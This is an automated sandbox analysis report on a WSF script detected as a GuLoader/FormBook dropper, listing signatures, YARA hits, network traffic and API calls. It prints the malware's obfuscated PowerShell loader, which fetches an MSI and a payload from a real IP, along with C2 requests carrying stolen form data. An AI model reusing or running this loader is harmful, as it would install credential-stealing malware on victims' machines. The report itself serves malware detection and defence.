Windows Analysis Report
CDS AC 661171855-VN1 SOA.wsf

Overview

General Information

Sample name: CDS AC 661171855-VN1 SOA.wsf
Analysis ID: 1432342
MD5: 7700a37bbfb2243c94b721449cc69b7f
SHA1: bc4e02172bfd1b919672b7480a8ddc5ad439ce9a
SHA256: 655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7
Tags: wsf

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0B6B0 FindFirstFileW,FindNextFileW,FindClose, 13_2_02D0B6B0

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\recover.exe Code function: 4x nop then xor eax, eax 13_2_02CF9330
Source: C:\Windows\SysWOW64\recover.exe Code function: 4x nop then pop edi 13_2_02D01C1B
Source: Joe Sandbox View IP Address: 87.121.105.163 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /domkapitler.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AKaUDBTG140.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jackcliu.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.smartfindsdepot.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.barpa.be
Source: global traffic DNS traffic detected: DNS query: www.jackcliu.com
Source: global traffic DNS traffic detected: DNS query: www.smartfindsdepot.shop
Source: unknown HTTP traffic detected: POST /u88q/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.smartfindsdepot.shopOrigin: http://www.smartfindsdepot.shopContent-Length: 209Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.smartfindsdepot.shop/u88q/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36Data Raw: 4a 44 31 78 3d 49 6c 59 65 4a 53 4c 55 33 55 47 4f 4d 6b 56 53 62 56 71 48 4f 6b 6a 70 78 75 6f 7a 78 38 5a 39 6b 4a 78 77 7a 30 69 39 6e 68 53 53 4a 44 65 74 57 51 47 6d 46 46 49 2f 77 64 63 75 4c 64 49 34 4a 43 47 57 52 72 67 44 6b 75 43 67 46 49 75 74 47 31 52 56 4b 72 52 37 74 55 70 46 6a 34 64 73 70 54 2b 54 31 4e 4f 31 70 6a 4f 5a 53 6d 69 4e 54 59 32 37 6e 48 54 2b 69 53 32 75 6c 75 5a 59 58 75 6a 35 38 69 68 58 71 73 37 58 4b 6f 79 74 36 43 6e 34 58 61 71 43 31 37 53 46 52 61 35 65 61 57 71 59 34 51 7a 7a 58 37 36 44 73 42 33 58 65 72 4a 74 54 6f 6e 72 31 79 4b 5a 71 59 51 36 4d 64 4b 4d 45 6a 73 61 54 66 41 57 Data Ascii: JD1x=IlYeJSLU3UGOMkVSbVqHOkjpxuozx8Z9kJxwz0i9nhSSJDetWQGmFFI/wdcuLdI4JCGWRrgDkuCgFIutG1RVKrR7tUpFj4dspT+T1NO1pjOZSmiNTY27nHT+iS2uluZYXuj58ihXqs7XKoyt6Cn4XaqC17SFRa5eaWqY4QzzX76DsB3XerJtTonr1yKZqYQ6MdKMEjsaTfAW
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 19:57:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2516302962.000002431EC0E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: wab.exe, 0000000A.00000002.2619504780.0000000004332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163//
Source: wab.exe, 0000000A.00000002.2632499102.000000001F2F0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin/
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.binb
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin~OU
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/domkapitler.msiP
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/domkapitler.msiXR
Source: powershell.exe, 00000002.00000002.2516302962.000002431EDC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: powershell.exe, 00000005.00000002.2451195111.00000000070E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microv
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.smartfindsdepot.shop
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.smartfindsdepot.shop/u88q/
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2516302962.000002431E15B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: recover.exe, 0000000D.00000003.3123298265.0000000007BC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: amsi64_7108.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_1364.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file: Call Blgfrugts.ShellExecute("P" & alphameric & ".e" + "xe", Sgeord, "", "", Universitetslektorer)
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3327
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3327
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . 
DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_1FDE2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_1FDE2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2B60 NtClose,LdrInitializeThunk, 10_2_1FDE2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE35C0 NtCreateMutant,LdrInitializeThunk, 10_2_1FDE35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2FE0 NtCreateFile, 10_2_1FDE2FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2F90 NtProtectVirtualMemory, 10_2_1FDE2F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2FB0 NtResumeThread, 10_2_1FDE2FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2FA0 NtQuerySection, 10_2_1FDE2FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2F60 NtCreateProcessEx, 10_2_1FDE2F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2F30 NtCreateSection, 10_2_1FDE2F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE2EE0 NtQueueApcThread, 10_2_1FDE2EE0
